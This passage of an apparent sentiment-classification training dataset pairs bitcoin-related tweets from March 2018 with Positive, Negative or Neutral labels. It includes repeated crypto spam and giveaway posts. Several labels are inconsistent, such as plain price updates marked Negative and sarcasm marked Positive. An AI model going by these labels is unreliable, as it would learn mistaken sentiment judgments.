of $5,521,670,000 (37.67%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,443.26\nChange in 1h: -0.07%\nMarket cap: $142,982,909,952.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8437.14\nEthereum:$518.863\nBitcoin Cash:$971.23\nLitecoin:$158.259\nRipple:$0.634721\nIOTA:$1.27298", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,401.86, EUR 6,812.67", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.32% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8437.14 / 6848.004\u20ac\n1 bitcoin-cash = $970.355 / 787.588\u20ac\n1 ethereum = $518.863 / 421.135\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "23Mar2018 06:00 UTC #Bitcoin #Blockchain status - Last 24h: 135 blocks mined - 1,036,281 BTC output - 182,105 transactions", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Keep centered on the story which will become Bitcoin's destiny: It is not just a money, it is an innovation, a protocol, a technology.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 22, 2018 11:00PM #Bitcoin Price:\nUSD 8643.95 | EUR 7021.63 | JPY 918005.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@jolb_ Top 10 Emotions The Biggest Bitcoin Miners Doesn\u2019t Want You To Know About", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8413.78/$8417.76 #Bitstamp\n$8408.90/$8411.29 #Kraken\n\u21e2$-8.86/$-2.49\n$8365.08/$8449.17 #Coinbase\n\u21e2$-52.68/$35.39", "output": 
"Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay Tcc is next bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8381.02 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0477892 (+0.00034490) #BTC / 401.096 (+3.46300) #USD. Market rank is 11. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002259 (+0.00000007) #BTC / 0.189612 (+0.00057) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004558 (-0.00000025) #BTC / 0.382547 (-0.00151) #USD. Market rank is 116. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003291 (+0.00000001) #BTC / 0.276204 (+0.00048) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8409.78 | -0.0025%\ud83d\udcc9\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078247 (+0.00000498) #BTC / 6.56728 (+0.04150) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! 
#bitcoin #litecoin #dogecoin #monero #usd #btc #nxt", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,418.00 v #BitcoinCash $968.24 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 15:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8382.00 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8382.00.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8382.00 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is $8382.00 \ud83d\udd14 $BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#RamenCoin $RAMEN #airdrop #bounty #ICO #ethereum #blockchain #bitcoin #BTS #cryptocurrency #altcoin\n@mskumar230078", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! 
#bitcoin #litecoin #dogecoin #monero #usd #btc #nxt", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8382.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin percentage of market cap: 44.35 %\n#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "CIBUS network is a block chain based eco system on food and health supplements'\n#bitcoin #ICO #ethereum #blockchain #cryptocurrency #CIBUS", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK! !", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8382.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "CIBUS network is a block chain based eco system on food and health supplements #bitcoin #ICO #ethereum #blockchain #cryptocurrency #CIBUS", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Not afraid of heights - afraid of widths. 
#bitcoin #mining #free", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin $8382.00 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8382.00 via Chain #BTCUSD #cryptocurrencies #blockchain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@yahaya_aminu Ditcoin is best cryptocurrency ditcoin my life Bitcoin my dream", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN IS AT 8445.2475", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#surprise #presents #crypto #bitcoin #ethereum #litecoin #tron #blockchain #party #game #cryptonews\n\nits awesome technology", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "MEarn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is the new gold ! 
Retweet if you agree #bitcoins #bitcoinisgold #bitcoinworld #bitcoinnews #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bxbynatyy_ Bitcoin by @RiceGum \ud83d\udd25", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$NEOUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "guys, Bitcoin is SO cool \ud83d\ude0e", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 07:07:28 2018 (42:07)\nUSD : 8456.67\nWght: 0.42\nBlk#: 514766\nSize: 1061.3 KB\nTXs: 2194\nPool: 2301 (1.5 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000302f93f324f3ff181ef7b90b0fa362e598a4282359d8b9 mined at height 514766.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8437.14 Down -$23.19 -0.27% in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mrupsys @alistairmilne So now bitcoin is an indication of intellectual ability?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.460,410\n1 Hour: 0.16 % | 24 Hours: -6.42 % | 7 Days: 3.24 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8476.41 / 6872.088\u20ac\n1 bitcoin-cash = $974.314 / 789.906\u20ac\n1 ethereum = $523.501 / 424.419\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Worrying! Looks like the way they do their routing currently is flawed. 
I hope they fix this.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "5c7cf1999d445141efe2e6fa5744b6b7c8d4cb6a822a9c767aa7bf4be03edad6/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "432835a27ab9454aa84965fa94656a7b8dc93a485326f11a809363992cabac5b/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "0387e434ab2d22b18484c814ce53ff04f6c612bddc82e01e4da31c2727dd41a3/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "eadf150ea606e1eafacb4818112bd04dc338d9b5cb7980729e6297a3be87c06f/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "54c46c61ca70a4928d435d791a0085dd119b49ba229ae37e667c71ab93ccd71c/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "74caa12b03207a43e3d9c52cfd736e72a01ffcaee2f8b6991bda1473a2748ff8/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "d8e78ddd912abc05ba635fba92e5349a23f6dbf6c6a457e6d7a6503a47b95119/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8456.44", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Drops Over 4% After Japan Warns World's Largest Cryptocurrency Exchange.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Everyone worried about the impending US-China Trade War? Invest in Cryptocurrancies #bitcoin #ethereum", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. 
Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin just moves this fast now, it aint fast, young, and fun anymore. Kinda like me.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ProfFaustus Jesus this was like reading a tabloid article. So you are advertising to be doing what Bitcoin already does? Great.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "i take great care about bitcoin can i just buy some ethereum on minecraft", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Here\u2019s a very good video on bitcoin guys, just watch it!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "another dip for #bitcoin from $9k to $8k, a good time to buy.\ud83d\ude00 #BTC #trading #bitconprice #price #Crypto #cryptocurrency", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "this guy brought up bitcoin on a first date but i'm considering a second b/c he had nice hair...i really do hate myself, huh", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "More\n#Ice #Pay #Airdrop #Bounty #Transaction #Performance #Bitcoin #Ethereum #MEW", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9448.00 --- Includes Sum of Forks, Core $8422.00 (89.14%) + Cash $968.87 (10.25%) + Gold $57.13 (0.60%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@magicalmoney_ Enter draw to win ten million MIM$ #bitcoin #crypto\n@IGlowInThe_Dark\n@shamsudean1\n\n3PEcKmEvpSanttic7TKtjFvgqFL3pgPhDKm", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8476.41.\nThe current price of BCash is $974.314, or 0.115429 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "TUBI will be listed at coinmarketcap very soon! \n#Altcoins #bitcoin #TokenFest #tokenSale #ethereum #Cryptos #cryptotrading", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@magicalmoney_ @CHUDDI_KAY @youb \nEnter draw to win ten million MIM$ #bitcoin #crypto\n\n3PEcKmEvpSanttic7TKtjFvgqFL3pgPhDKm", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@magicalmoney_ @UMARUBERNARD @crypto_xpress \nEnter draw to win ten million MIM$ #bitcoin #crypto\n\n3PEcKmEvpSanttic7TKtjFvgqFL3pgPhDKm", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$974,314\n1 Hour: 0.27 % | 24 Hours: -7.08 % | 7 Days: 5.90 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PatWielandLIVE @DigiByteCoin #DigiByte baby, yeahhhhh buddy!!\n\n#DigiHash #DigibyteOneClickMiner #InternationalDayOfHappiness #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CodeSCrypto @coindesk Like... why has Bitcoin not climbed to $1.0Mil yet from this? Lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Two Hour Lull Update: CryptoCompare Bitcoin price: $8419.34 #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "POWR is now \u00a30.24. 
#crypto #cryptocurrency #bitcoin #altcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "inb4: \"Black Friday\" $btc $DJI #crypto #bitcoin #tradewars #donaldpump", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay Tcc one and only one best second Bitcoin cryptocrency", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8480.91 / 6875.736\u20ac\n1 bitcoin-cash = $974.49 / 790.049\u20ac\n1 ethereum = $524.644 / 425.345\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cylinders_io Interesting project good future for him! #CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MarkYusko @FoxBusiness @MorningsMaria @MariaBartiromo is there an over under on how many times you use the word \u2018bitcoin\u2019 on the show?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@chuckwoolery All the more reason to give gun owners and gun dealers reason to use Bitcoin!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ValoremF this is something we need in the future. #AdVelorem #Bitcoin #Valorem #Ico #VLR", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@missbitcoin_mai I wish Bitcoin was spelled \"Bit-o-coin\", sounds cool", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@superwuster Bitcoin. 
\nHave never used Amazon in Australia.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Yea I refer to cash as prehistoric money. Deal with it. \n\n#cryptocurrency #Bitcoin #blockchain #PIVX", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nytimes @Bitcoin All the more reason for gun owners and gun dealers start using bitcoin!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Excellent projects always deserve a lot of attention. #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@esocktheman 2-time best man, ordained wedding officiant and international battle rapper. hmu for rates, Bitcoin only.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BKachel Are you the bitcoin spammer!?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge and thousands of people who went in 2011 all in, don\u2019t care about bitcoin cash\ud83e\udd14", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@officialmcafee John, do you know if bitcoin is a creature of CIA?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Add the two letters\u201ech\u201c somwhere to #bitcoin. Yeah right... that\u2018s some swiss bank conpiracy theory shit. Don\u2018t buy this crap!", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fuck a bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Interested in learning more about blockchain and cryptocurrency like Bitcoin? Come join me and IBM at the IBM Coder Program! #IBMCoder", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JeremyRubin @prestonjbyrne How bout you create a Bitcoin fork for people that want to call Satoshi she? \ud83d\ude02", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aliraja How can you 'predict' when bitcoin goes down?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mainly focuses on #bitcoin and #ethereum", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BeenSuave_23 def time machine.. 
i can buy bitcoin before the blow up, and see my lost ones..", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DavidHayCrypto But the real question is: How much Bitcoin is it worth?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8452.41\nEthereum:$522.493\nBitcoin Cash:$971.799\nLitecoin:$158.521\nRipple:$0.636124\nIOTA:$1.27449", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8452.41 / 6852.63\u20ac\n1 bitcoin-cash = $971.799 / 787.867\u20ac\n1 ethereum = $521.708 / 422.965\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8417.00@bitstamp. High $9028.740. Low $8342.000. Market Cap $142.535 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "FACT: Bitcoin network speed in 2013 began at 25TH/s and reached 11000TH/s by years end, eclipsing all of the worlds supercomputers combined.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078052 (-0.00000195) #BTC / 6.56003 (-0.00725) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002255 (-0.00000004) #BTC / 0.189556 (-0.00006) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0478863 (+0.00009710) #BTC / 402.467 (+1.37100) #USD. Market rank is 11. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004536 (-0.00000022) #BTC / 0.381257 (-0.00129) #USD. Market rank is 116. 
#substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003306 (+0.00000015) #BTC / 0.277827 (+0.00162) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8452.41 as of Fri Mar 23 01:31:09 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8423.62", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The technology is not under threat at all, it is extraordinary, highly successful #pauldavis #bitcoin #bitcoins #btc", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BitcoinEdu And now we are close to 25 Exahash/s and it's turned out to be one of the big challenges with #Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's already happening, an informed govt. will never stop it. 
@wef #bitcoin #blockchain #ethereum #cryptocurrency #altcoi", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just won free 10 satoshi from PlayBitcoin \ud83d\ude0d #bitcoin #faucet #satoshi #freebitcoin @welovefaucet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u2018Diet Bitcoin\u2019: Brother of Drug Kingpin Pablo Escobar Launches Bizarre ICO, Claims He Met Satoshi #blockchain $btc #trading", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@FaucetHubIO how can I make a new address for bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "binance...bitcoin.......Bussy", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN futures: 8,400 (-200)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CaptainScio dude u are amazing. Whats ur latest thoughts on crypto and bitcoin etc... in relation to Gann theory", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The year is 2020:\n\nThe Bitcoin community has forked again due to irreconcilable differences about Satoshi's gender.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@AnselLindner @Bitcoin And they act like they're decentralized. 
Talk about virtue signaling.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@FoxBusiness #2A banking system just gave every American reason to start using #bitcoin!! #cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Sea of Red for #cryptocurrency today. #Bitcoin, #Ethereum, #Ripple take the plunge. Hope you enjoy the profits", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hey team...Just a reminder that the ICO price of $WAN was .34$....patience. #Bitcoin #eth #neo", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_Kevin_Pham Yeah but Bitcoin Trans is going to be FABULOUUUUUS!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Goldman Sachs apparently requires 100% margin from most customers for clearing BITCOIN FUTURES.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8449.82 / 6850.531\u20ac\n1 bitcoin-cash = $967.86 / 784.674\u20ac\n1 ethereum = $521.273 / 422.612\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ICODrops Another killer eth and bitcoin :))))))))(", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BloombergDotOrg @Mayors4Climate Talk Bitcoin only!!!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Next stop 5k. 
